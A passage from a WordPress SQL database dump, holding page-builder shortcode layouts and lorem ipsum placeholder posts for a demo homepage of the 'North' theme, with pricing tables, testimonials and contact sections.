passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709770765{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709776984{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709787994{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506097407{padding-top: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dots_dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\" video=\"mSLAF_DjiDU\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409759263341{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384b99d-fe26b885-0403\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384b99d-fe26b885-0403\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6b99d-fe26b885-0403\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home','','inherit','closed','closed','','1916-revision-v1','','','2014-09-15 03:14:21','2014-09-15 03:14:21','',1916,'http://highperformingstudent.com/2014/09/15/1916-revision-v1/',0,'revision','',0),(265,1,'2014-07-04 11:42:20','2014-07-04 11:42:20','Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of \"de Finibus Bonorum et Malorum\" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, \"Lorem ipsum dolor sit amet..\", comes from a line in section 1.10.32.\n\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of \"de Finibus Bonorum et Malorum\" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, \"Lorem ipsum dolor sit amet..\", comes from a line in section 1.10.32.','1914 translation by H. Rackham','','publish','open','open','','1914-translation-by-h-rackham','','','2014-07-04 11:42:20','2014-07-04 11:42:20','',0,'http://localhost/north1/?p=265',0,'post','',0),(274,1,'2014-07-04 12:14:59','2014-07-04 12:14:59','Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of \"de Finibus Bonorum et Malorum\" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, \"Lorem ipsum dolor sit amet..\", comes from a line in section 1.10.32.\n\n\"On the other hand, we denounce with righteous indignation and dislike men who are so beguiled and demoralized by the charms of pleasure of the moment, so blinded by desire, that they cannot foresee the pain and trouble that are bound to ensue; and equal blame belongs to those who fail in their duty through weakness of will, which is the same as saying through shrinking from toil and pain. These cases are perfectly simple and easy to distinguish. In a free hour, when our power of choice is untrammelled and when nothing prevents our being able to do what we like best, every pleasure is to be welcomed and every pain avoided. But in certain circumstances and owing to the claims of duty or the obligations of business it will frequently occur that pleasures have to be repudiated and annoyances accepted. The wise man therefore always holds in these matters to this principle of selection: he rejects pleasures to secure other greater pleasures, or else he endures pains to avoid worse pains.\"\n\n\"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\"','Gallery Post','','publish','open','open','','gallery-post','','','2014-07-04 12:14:59','2014-07-04 12:14:59','',0,'http://localhost/north1/?p=274',0,'post','',0),(1932,1,'2020-10-28 13:52:48','2020-10-28 13:52:48','[vc_row css=\".vc_custom_1405457897351{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #4c4c4c !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"false\" bg_overlay=\"dots_dark\" video=\"mSLAF_DjiDU\"][vc_column width=\"1/1\"][vntd_fullscreen_slider text_static=\"The goods you need now\" style=\"style1\" posts_nr=\"6\" bg_overlay=\"dark1\" button1_label=\"Read more\" button1_url=\"#about\" animated=\"no\" text_dynamic=\"WE CREATE AWESOME THEMES!,We are Designers,We love to Design\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\r\n<h1>PARALLAX WITH DEGRADE</h1>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\r\n\r\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\r\n\r\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\r\n\r\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\r\n\r\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\r\n\r\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\r\n\r\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\r\n\r\n[/list]\r\n\r\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\r\n\r\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452942369{padding-bottom: 50px !important;background-color: #1a1a1a !important;border-color: #eeeeee !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406710070153{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406710078643{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406710087331{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506397651{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452967628{padding-bottom: 70px !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405451859507{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1a1a1a !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row 